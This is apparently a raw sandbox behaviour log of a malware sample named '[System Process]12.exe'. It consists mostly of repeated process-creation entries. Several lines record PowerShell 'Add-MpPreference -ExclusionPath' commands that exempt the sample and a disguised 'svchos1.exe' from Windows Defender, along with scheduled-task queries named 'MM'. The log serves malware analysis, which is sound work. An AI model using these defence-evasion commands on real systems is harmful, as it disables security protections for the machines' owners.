Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\[System Process]12.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: srvcli.dll	Jump to behavior
